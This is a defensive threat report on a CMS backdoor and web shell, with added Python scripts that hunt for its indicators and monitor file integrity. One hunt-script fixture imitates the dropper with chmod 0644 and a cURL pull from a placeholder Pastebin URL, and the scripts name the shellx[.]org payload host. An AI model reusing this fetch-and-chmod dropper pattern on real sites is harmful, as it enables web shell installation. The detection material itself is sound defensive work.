Backdoor Malware Overview

This report covers a backdoor with web shell capability that targets several content management systems (CMS). Based on the findings of the Sucuri researchers who analyzed it, there is a strong indication that the malware was written by a Turkish-speaking actor. The backdoor is built to inject content into the infected website.

Tactics, Techniques, and Procedures

The malware is designed to target a variety of content management systems by looking for core files, such as /includes/defines.php for Joomla. It checks for Joomla first and then looks for WordPress, OpenCart, and PrestaShop. Once a CMS is found, the infection chain begins by changing the permissions of specified files to 644 (owner read and write; group and everyone else read-only) and pulling down code from the popular paste site Pastebin. The code is fetched by a custom http_get() function built on cURL, using a generated Pastebin link.

The initial script written onto the web server looks like this:

(Image: backdoor shell dropper script)

Image Source: Sucuri

When targeting Joomla, the malware downloads two archives, joomlahide.zip and joomla.zip, from the domain shellx[.]org. One archive contains a backdoor built for uploading files; the other contains the An0n_3xPloiTeR web shell, which offers website defacement, site color changes, code injection, logout and self-removal options, and much more.
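As an added example (my code, not the Sucuri write-up's or this report's), the following Python hunt script checks a webroot for the markers described above: it fingerprints the CMS the same way the dropper does, then flags files carrying the indicators named in the text (the shellx[.]org host, the An0n_3xPloiTeR shell, the two zip names, and the chmod-644-plus-cURL-from-Pastebin pattern). Only the Joomla marker path comes from the report; the WordPress, OpenCart and PrestaShop paths and the sample webroot are my assumptions, constructed inline so the script runs offline.

```python
"""Hunt for the dropper and web shell indicators described in the report.

Added example, not code from the Sucuri write-up. The sample webroot is
constructed inline so the script runs offline; the CMS marker paths other
than Joomla's are assumptions.
"""
import re
import tempfile
from pathlib import Path

# Core files the dropper looks for to identify the CMS. Joomla's path is
# given in the report; the other three are my assumptions.
CMS_MARKERS = {
    "Joomla": "includes/defines.php",
    "WordPress": "wp-includes/version.php",
    "OpenCart": "system/startup.php",
    "PrestaShop": "config/settings.inc.php",
}

# Strings named in the report; any one of them is enough to flag a file.
# The shellx pattern also matches the defanged form "shellx[.]org".
HARD_INDICATORS = {
    "shellx.org download host": re.compile(r"shellx\[?\.\]?org", re.I),
    "An0n_3xPloiTeR web shell": re.compile(r"An0n_3xPloiTeR", re.I),
    "joomla(hide).zip payload": re.compile(r"joomla(?:hide)?\.zip", re.I),
}

# Behavioural pattern from the TTP section: chmod to 644 plus a cURL pull
# from Pastebin. All three must be present to avoid flagging normal code.
CHMOD_644 = re.compile(r"chmod\s*\([^;]*?0?644\b")
CURL_CALL = re.compile(r"curl_(?:init|setopt|exec)\s*\(")
PASTEBIN = re.compile(r"pastebin\.com", re.I)

MAX_BYTES = 2 * 1024 * 1024  # skip large media; the dropper is a small script


def detect_cms(root: Path) -> list:
    """Return the CMS names whose marker file exists under root."""
    return [name for name, marker in CMS_MARKERS.items()
            if (root / marker).is_file()]


def classify_text(text: str) -> list:
    """Return the list of indicator names found in one file's contents."""
    hits = [name for name, rx in HARD_INDICATORS.items() if rx.search(text)]
    if CHMOD_644.search(text) and CURL_CALL.search(text) and PASTEBIN.search(text):
        hits.append("chmod 644 + cURL pull from Pastebin")
    return hits


def scan_webroot(root) -> dict:
    """Fingerprint the CMS and map each suspicious file to its indicators."""
    root = Path(root)
    suspicious = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.stat().st_size > MAX_BYTES:
            continue
        hits = classify_text(path.read_text(encoding="utf-8", errors="ignore"))
        if hits:
            suspicious[path.relative_to(root).as_posix()] = hits
    return {"cms": detect_cms(root), "suspicious": suspicious}


# Constructed sample webroot: a Joomla marker, a benign page, and two files
# that imitate only the behaviours the report describes (no real payload;
# the paste ID is a placeholder).
SAMPLE_FILES = {
    "includes/defines.php": "<?php\ndefine('JPATH_BASE', __DIR__);\n",
    "index.php": "<?php\necho 'welcome';\n",
    "images/cache.php": (
        "<?php\n"
        "$root = $_SERVER['DOCUMENT_ROOT'];\n"
        "if (file_exists($root . '/includes/defines.php')) {\n"
        "    chmod($root . '/index.php', 0644);\n"
        "    $ch = curl_init('https://pastebin.com/raw/XXXXXXXX');\n"
        "    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n"
        "    $payload = curl_exec($ch);\n"
        "}\n"
    ),
    "tmp/up.php": "<?php\n// An0n_3xPloiTeR\n$src = 'http://shellx[.]org/joomla.zip';\n",
}


def build_sample_webroot() -> Path:
    """Write SAMPLE_FILES into a fresh temporary directory and return it."""
    root = Path(tempfile.mkdtemp(prefix="webroot_"))
    for rel, body in SAMPLE_FILES.items():
        dest = root / rel
        dest.parent.mkdir(parents=True, exist_ok=True)
        dest.write_text(body, encoding="utf-8")
    return root


if __name__ == "__main__":
    result = scan_webroot(build_sample_webroot())
    print("CMS detected:", ", ".join(result["cms"]) or "none")
    for rel, hits in result["suspicious"].items():
        print(f"{rel}: {'; '.join(hits)}")
```

Point scan_webroot() at a real document root to use it; the behavioural rule requires all three of chmod 644, a cURL call and a Pastebin URL in the same file, so ordinary installer code that merely calls chmod() is not flagged.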

Business Unit Impact

  • May result in permission changes to core website files.
  • Could lead to the defacement of a critical business asset such as the company website.
  • May compromise the file integrity of the website.
  • May give a bad actor control over the client-facing content of your website.

Recommendations

It is highly encouraged that you monitor your web presence for changes to key files using file integrity monitoring (FIM). Consider deploying an OSSEC agent if you use AlienVault, or turning on the AIE rules for FIM in LogRhythm. Because the dropper pulls its payload from Pastebin and shellx[.]org, alerting on outbound web requests from the web server to paste sites and unknown hosts gives a second detection point. Maintain regular backups of your website, both onsite and offsite, as a precaution against a compromise.
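As an added example of the file integrity monitoring recommended above (again my code, not part of the report and not an OSSEC or LogRhythm configuration), a small Python baseline-and-compare routine that records a SHA-256 digest and the permission bits of every file under a webroot. Recording the mode matters here because the dropper flips files to 644 before it writes anything, so a permission-only change is reported on its own line rather than lost. The webroot, the tampering and the dropped file in demo() are constructed so the script runs offline.

```python
"""Baseline-and-compare file integrity check for a CMS webroot.

Added example, not part of the original report and not an OSSEC or
LogRhythm configuration. The webroot and the tampering in demo() are
constructed so the script runs offline.
"""
import hashlib
import json
import os
import stat
import tempfile
from pathlib import Path


def _sha256(path: Path) -> str:
    """Stream a file through SHA-256 so large media is not read into memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root) -> dict:
    """Record hash and permission bits for every regular file under root."""
    root = Path(root)
    baseline = {}
    for path in root.rglob("*"):
        if path.is_file():
            baseline[path.relative_to(root).as_posix()] = {
                "sha256": _sha256(path),
                "mode": oct(stat.S_IMODE(path.stat().st_mode)),
            }
    return baseline


def compare(baseline: dict, current: dict) -> dict:
    """Diff two baselines. A content change wins over a mode change, so a
    rewritten file is listed once, under 'modified'; a file whose bytes are
    intact but whose permissions moved is listed under 'mode_changed'."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified, mode_changed = [], []
    for rel in sorted(set(baseline) & set(current)):
        if baseline[rel]["sha256"] != current[rel]["sha256"]:
            modified.append(rel)
        elif baseline[rel]["mode"] != current[rel]["mode"]:
            mode_changed.append(rel)
    return {"added": added, "removed": removed,
            "modified": modified, "mode_changed": mode_changed}


def save_baseline(baseline: dict, dest) -> None:
    Path(dest).write_text(json.dumps(baseline, indent=2, sort_keys=True))


def load_baseline(src) -> dict:
    return json.loads(Path(src).read_text())


def demo() -> dict:
    """Constructed scenario: snapshot a tiny Joomla-like webroot, then imitate
    the dropper (chmod 644 on a core file, a new PHP file written) and a
    defacement (index.php rewritten), and report the differences."""
    root = Path(tempfile.mkdtemp(prefix="webroot_"))
    files = {
        "includes/defines.php": "<?php\ndefine('JPATH_BASE', __DIR__);\n",
        "configuration.php": "<?php\nclass JConfig {}\n",
        "index.php": "<?php\necho 'welcome';\n",
    }
    for rel, body in files.items():
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(body)
        os.chmod(path, 0o640)  # deliberately tighter than the 644 the dropper sets
    # Keep the snapshot outside the webroot so it is not itself baselined.
    snapshot = root.parent / (root.name + ".baseline.json")
    save_baseline(build_baseline(root), snapshot)

    os.chmod(root / "configuration.php", 0o644)                  # permission flip only
    (root / "index.php").write_text("<?php\necho 'defaced';\n")  # content change
    (root / "images").mkdir()
    (root / "images" / "cache.php").write_text("<?php\n// dropped file\n")

    return compare(load_baseline(snapshot), build_baseline(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

Store the snapshot off the web host, or at minimum outside the webroot and unwritable by the web server's user: a dropper that can chmod and write files can just as easily rewrite a baseline it can reach. Re-baseline only after a verified deployment, never from a host you suspect is already compromised.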
